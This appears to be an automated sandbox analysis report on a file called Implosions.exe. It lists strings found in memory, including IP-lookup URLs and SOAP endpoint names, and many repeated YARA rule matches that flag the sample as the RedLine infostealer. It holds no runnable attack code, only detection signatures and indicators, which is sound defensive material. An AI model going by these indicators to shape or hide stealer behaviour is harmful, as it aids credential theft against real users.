            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Implosions.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.0.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00408C600_2_00408C60
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040DC110_2_0040DC11
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00407C3F0_2_00407C3F
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00418CCC0_2_00418CCC
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00406CA00_2_00406CA0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004028B00_2_004028B0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0041A4BE0_2_0041A4BE
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00408C600_2_00408C60
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004182440_2_00418244
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004016500_2_00401650
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00402F200_2_00402F20
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004193C40_2_004193C4
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004187880_2_00418788
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00402F890_2_00402F89
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00402B900_2_00402B90
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004073A00_2_004073A0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BEB700_2_021BEB70
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BE4EF0_2_021BE4EF
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CACD000_2_05CACD00
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA2D380_2_05CA2D38
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA12880_2_05CA1288
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA32700_2_05CA3270
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA7F880_2_05CA7F88
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA08100_2_05CA0810
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CA35A10_2_05CA35A1
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CEA4480_2_05CEA448
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE59680_2_05CE5968
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE87880_2_05CE8788
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE87980_2_05CE8798
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05D67D700_2_05D67D70
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05D626D00_2_05D626D0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05D64ED00_2_05D64ED0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DEC53F0_2_05DEC53F
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DECCF00_2_05DECCF0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DE00400_2_05DE0040
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DE00330_2_05DE0033
            Source: C:\Users\user\Desktop\Implosions.exeCode function: String function: 0040E1D8 appears 43 times
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000003.1668313464.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2911841113.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Implosions.exe
            Source: Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Implosions.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.0.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
